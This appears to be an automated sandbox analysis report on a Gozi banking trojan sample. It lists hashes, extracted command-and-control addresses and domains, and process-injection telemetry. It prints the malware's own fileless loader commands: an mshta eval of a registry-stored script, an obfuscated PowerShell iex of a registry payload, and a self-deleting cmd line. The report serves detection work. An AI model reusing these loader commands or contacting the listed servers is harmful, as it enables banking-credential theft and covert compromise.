gozi | 729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab

Analysis

max time kernel
156s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2023 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

client.exe
Size

295KB
MD5

de21fe50192a021dd37b67881fd332ba
SHA1

44c9c72bf5cd81a82ce7870dc765095f303c7fdf
SHA256

729398faa8543e0a21d46b6881a4111d9c36c05e05f6efe669286f668ac97cab
SHA512

6650fe6e0f2866e442a9f753f90fc8aaf594d1d976207a94724f506d840ad6514b4c18392cbc3d51304dd2afb7fadce72f71b385899136b2e593c9fc1eda934a
SSDEEP

3072:F62X2mvtkAa8QoRzUA/nAUZSuJC/w3mA8FfbJ1fzodp/jhNGY:s2XXviAa8QontJF3b8NHfzodpv

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

185.247.184.139

62.72.33.155

incontroler.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

expirew.com

whofos.com

onlinepoints.online

onlinepoints.top

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4704 set thread context of 3180	4704	powershell.exe	Explorer.EXE
PID 3180 set thread context of 3756	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 3992	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 4772	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 set thread context of 2592	3180	Explorer.EXE	cmd.exe
PID 2592 set thread context of 852	2592	cmd.exe	PING.EXE
PID 3180 set thread context of 4200	3180	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1424 4844 WerFault.exe client.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

852 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

852 PING.EXE

pid	pid_target	process	target process
1424	4844	WerFault.exe	client.exe

pid	process
852	PING.EXE

pid	process
852	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

client.exepowershell.exeExplorer.EXE

pid	process
4844	client.exe
4844	client.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3180 Explorer.EXE
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4704 powershell.exe
3180 Explorer.EXE
3180 Explorer.EXE
3180 Explorer.EXE
3180 Explorer.EXE
3180 Explorer.EXE
2592 cmd.exe

pid	process
3180	Explorer.EXE

pid	process
4704	powershell.exe
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
3180	Explorer.EXE
2592	cmd.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3180	Explorer.EXE
Token: SeCreatePagefilePrivilege	3180	Explorer.EXE
Token: SeShutdownPrivilege	3756	RuntimeBroker.exe
Token: SeShutdownPrivilege	3756	RuntimeBroker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3180 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3180 Explorer.EXE

pid	process
3180	Explorer.EXE

pid	process
3180	Explorer.EXE

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3012 wrote to memory of 4704	3012	mshta.exe	powershell.exe
PID 3012 wrote to memory of 4704	3012	mshta.exe	powershell.exe
PID 4704 wrote to memory of 2620	4704	powershell.exe	csc.exe
PID 4704 wrote to memory of 2620	4704	powershell.exe	csc.exe
PID 2620 wrote to memory of 1692	2620	csc.exe	cvtres.exe
PID 2620 wrote to memory of 1692	2620	csc.exe	cvtres.exe
PID 4704 wrote to memory of 3188	4704	powershell.exe	csc.exe
PID 4704 wrote to memory of 3188	4704	powershell.exe	csc.exe
PID 3188 wrote to memory of 4356	3188	csc.exe	cvtres.exe
PID 3188 wrote to memory of 4356	3188	csc.exe	cvtres.exe
PID 4704 wrote to memory of 3180	4704	powershell.exe	Explorer.EXE
PID 4704 wrote to memory of 3180	4704	powershell.exe	Explorer.EXE
PID 4704 wrote to memory of 3180	4704	powershell.exe	Explorer.EXE
PID 4704 wrote to memory of 3180	4704	powershell.exe	Explorer.EXE
PID 3180 wrote to memory of 3756	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3756	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3756	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3756	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3992	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3992	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3992	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 3992	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4772	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4772	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 2592	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 2592	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 2592	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 4772	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 4772	3180	Explorer.EXE	RuntimeBroker.exe
PID 3180 wrote to memory of 2592	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 2592	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 4200	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 4200	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 4200	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 4200	3180	Explorer.EXE	cmd.exe
PID 2592 wrote to memory of 852	2592	cmd.exe	PING.EXE
PID 2592 wrote to memory of 852	2592	cmd.exe	PING.EXE
PID 2592 wrote to memory of 852	2592	cmd.exe	PING.EXE
PID 2592 wrote to memory of 852	2592	cmd.exe	PING.EXE
PID 2592 wrote to memory of 852	2592	cmd.exe	PING.EXE
PID 3180 wrote to memory of 4200	3180	Explorer.EXE	cmd.exe
PID 3180 wrote to memory of 4200	3180	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3180

C:\Users\Admin\AppData\Local\Temp\client.exe
"C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 476
3⤵
- Program crash
PID:1424

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gls4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gls4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vyfiwhuwuv -value gp; new-alias -name wioitvet -value iex; wioitvet ([System.Text.Encoding]::ASCII.GetString((vyfiwhuwuv "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxkkgg54\wxkkgg54.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB9D5.tmp" "c:\Users\Admin\AppData\Local\Temp\wxkkgg54\CSC1A50C10D88834421A95491A1BDD5C6.TMP"
5⤵
PID:1692

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4rrlmt3f\4rrlmt3f.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB5C.tmp" "c:\Users\Admin\AppData\Local\Temp\4rrlmt3f\CSC2749FB8B86494C33B8F4D0BEF242C3C5.TMP"
5⤵
PID:4356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\client.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2592

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:852

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4200

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3992

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4844 -ip 4844
1⤵
PID:3568

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4rrlmt3f\4rrlmt3f.dll
Filesize
3KB

MD5
7a11936f16a3fbf0c9b3a24295ff91b8

SHA1
c3029236d5ae713ee6fa7b32351e5e75aee5cbe6

SHA256
78f8f8490f864fa1d99d9566caefca880a409507783e75f38e96cc81379532fb

SHA512
ba346f8a638035131d49738bdad90a7022eff9382a7c7163d353daeb54b733b49b9993f546e845316b1d651c725adbc7cdf255233797c5889a960e64b664d283

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB9D5.tmp
Filesize
1KB

MD5
98a3880a7f388fb5ec0ef230ed13a0dd

SHA1
c7aceb11786a5b925a40d7f86eb65ff5ff0bcffb

SHA256
cc87c2b6acf0bb8b56c78effa6136ba833adbcbcb9ef458b89022f4f9cd05527

SHA512
b3db29ba59b73af08656d9683bc4a35fcd3267b00f0c57f3e0af5ff24953f6e665cbb606556a8facb0c1298663aa15c95734ceb4b576cbe03087eb298ae7f8d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBB5C.tmp
Filesize
1KB

MD5
4e812535a969aa2e7f416a55fbe0114d

SHA1
6e4df53aa04db6cc152c3fc229da91de849415ac

SHA256
79d769fba6aaba7e96e601be14d6de8aae77af5486434edbccbff183888f0786

SHA512
ed0732be868593547ed628dbad5a357d012a7a65a264d3713c1cf26c7ed8949182b2f1fadbfd7f914472a6ca9e41646efb31ab6135aa23d8abd307c161f08a4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5nkjlzpj.zm1.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wxkkgg54\wxkkgg54.dll
Filesize
3KB

MD5
d8ee207569fafd9f13fbe0a21b70ee4a

SHA1
61ce9ef2ce28dd542d07aaf81d948fbc66f26828

SHA256
6d62b12ba8096ab5dde52c59d25da6017ef8dbb4eb42324de5490fdb84740d13

SHA512
007eaa9b81a686f54021cd13e690f6664d74ef48a658b12eada252b4d61a59e93a73e29bd4cd5ad7b6f7008728ff0bf7f48599928ecf057c58db733cb78fdd01

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4rrlmt3f\4rrlmt3f.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4rrlmt3f\4rrlmt3f.cmdline
Filesize
369B

MD5
69b533be7ccea25eb1ce09dc1bfec589

SHA1
df94c524268c75dc324ef545de283575005986db

SHA256
c98a00d8ab285b0db24eccf8dd5b1eda201e7ffd8976cf422ffdd0a314ff50f8

SHA512
90482287dc56f49f3ad549ec686f4bd508f4cb49d9148257278f4c99c229b5fe466945d010f525dc723a011e58e731a37bc9c5f24392532a50b0699f4a9759be

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4rrlmt3f\CSC2749FB8B86494C33B8F4D0BEF242C3C5.TMP
Filesize
652B

MD5
2b07b5165e1264732f24c20811a6e882

SHA1
af9ef42390b270adef8a3acfc766d45e9fad3ffa

SHA256
f171a671204be35267a314214ebb123288ea0cb83ea41a216a5344a04ce85785

SHA512
ddfa30840826b600f895992b7881fd809427ef1a0a99b057681357e887d984378fd32387e82c60388f82c1a208749defa9385403788709ab6cd8505c95bc3f50

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wxkkgg54\CSC1A50C10D88834421A95491A1BDD5C6.TMP
Filesize
652B

MD5
fbd4c87bf9b0fbe3f5bdf1565f46108d

SHA1
a1436199576731a72b14345cce25b19190a70762

SHA256
484cf7884d0702c58ea4508d87a0cb68c7150eafcbad8a49f489c925d4612bef

SHA512
c23bd44de43c97e631bc957156d9ad3833ee774f0839133996e023316451d251390e57984a0f6337aae3a097a012d5e5a788ad725c019a4d4e5106a65cb2319e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wxkkgg54\wxkkgg54.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wxkkgg54\wxkkgg54.cmdline
Filesize
369B

MD5
709309c3dbb63f41df63cc295ffbb5f0

SHA1
af40f8222773e8d9767f68fad3e99ff88cd369e8

SHA256
fee151620e21f167f537dc58d54d5fe70b456a27b83c5f74fdb5bbcd0f7dc1a4

SHA512
232360f661f4c0b9eedeac8b70ef8d911891369e495c570742de8e7ff7843ba0069c44c55050a8955bcf7898cc9b8f7dd4afac18fc042591d402ba877b86dcaa

Download Submit
memory/852-113-0x0000019B956B0000-0x0000019B95754000-memory.dmp

Filesize
656KB

Download
memory/852-98-0x0000019B956B0000-0x0000019B95754000-memory.dmp

Filesize
656KB

Download
memory/852-101-0x0000019B954A0000-0x0000019B954A1000-memory.dmp

Filesize
4KB

Download
memory/2592-92-0x0000025107F30000-0x0000025107F31000-memory.dmp

Filesize
4KB

Download
memory/2592-91-0x0000025108120000-0x00000251081C4000-memory.dmp

Filesize
656KB

Download
memory/2592-114-0x0000025108120000-0x00000251081C4000-memory.dmp

Filesize
656KB

Download
memory/3180-99-0x0000000008DD0000-0x0000000008E74000-memory.dmp

Filesize
656KB

Download
memory/3180-59-0x0000000008DD0000-0x0000000008E74000-memory.dmp

Filesize
656KB

Download
memory/3180-60-0x0000000001190000-0x0000000001191000-memory.dmp

Filesize
4KB

Download
memory/3756-74-0x000001D400220000-0x000001D400221000-memory.dmp

Filesize
4KB

Download
memory/3756-105-0x000001D400800000-0x000001D4008A4000-memory.dmp

Filesize
656KB

Download
memory/3756-73-0x000001D400800000-0x000001D4008A4000-memory.dmp

Filesize
656KB

Download
memory/3992-110-0x000002C9630C0000-0x000002C963164000-memory.dmp

Filesize
656KB

Download
memory/3992-80-0x000002C963080000-0x000002C963081000-memory.dmp

Filesize
4KB

Download
memory/3992-79-0x000002C9630C0000-0x000002C963164000-memory.dmp

Filesize
656KB

Download
memory/4200-109-0x0000000000500000-0x0000000000598000-memory.dmp

Filesize
608KB

Download
memory/4200-107-0x00000000004C0000-0x00000000004C1000-memory.dmp

Filesize
4KB

Download
memory/4200-104-0x0000000000500000-0x0000000000598000-memory.dmp

Filesize
608KB

Download
memory/4704-26-0x00000269EA700000-0x00000269EA710000-memory.dmp

Filesize
64KB

Download
memory/4704-25-0x00007FFC77A50000-0x00007FFC78511000-memory.dmp

Filesize
10.8MB

Download
memory/4704-70-0x00007FFC77A50000-0x00007FFC78511000-memory.dmp

Filesize
10.8MB

Download
memory/4704-57-0x00000269EC950000-0x00000269EC98D000-memory.dmp

Filesize
244KB

Download
memory/4704-55-0x00000269EC940000-0x00000269EC948000-memory.dmp

Filesize
32KB

Download
memory/4704-20-0x00000269EC590000-0x00000269EC5B2000-memory.dmp

Filesize
136KB

Download
memory/4704-71-0x00000269EC950000-0x00000269EC98D000-memory.dmp

Filesize
244KB

Download
memory/4704-41-0x00000269EC920000-0x00000269EC928000-memory.dmp

Filesize
32KB

Download
memory/4704-27-0x00000269EA700000-0x00000269EA710000-memory.dmp

Filesize
64KB

Download
memory/4772-86-0x000001AA08DF0000-0x000001AA08DF1000-memory.dmp

Filesize
4KB

Download
memory/4772-84-0x000001AA0AFF0000-0x000001AA0B094000-memory.dmp

Filesize
656KB

Download
memory/4772-112-0x000001AA0AFF0000-0x000001AA0B094000-memory.dmp

Filesize
656KB

Download
memory/4844-1-0x0000000002600000-0x0000000002700000-memory.dmp

Filesize
1024KB

Download
memory/4844-10-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/4844-9-0x0000000003FE0000-0x0000000003FEB000-memory.dmp

Filesize
44KB

Download
memory/4844-8-0x0000000002600000-0x0000000002700000-memory.dmp

Filesize
1024KB

Download
memory/4844-5-0x0000000004050000-0x000000000405D000-memory.dmp

Filesize
52KB

Download
memory/4844-4-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/4844-111-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/4844-3-0x0000000000400000-0x0000000002290000-memory.dmp

Filesize
30.6MB

Download
memory/4844-2-0x0000000003FE0000-0x0000000003FEB000-memory.dmp

Filesize
44KB

Download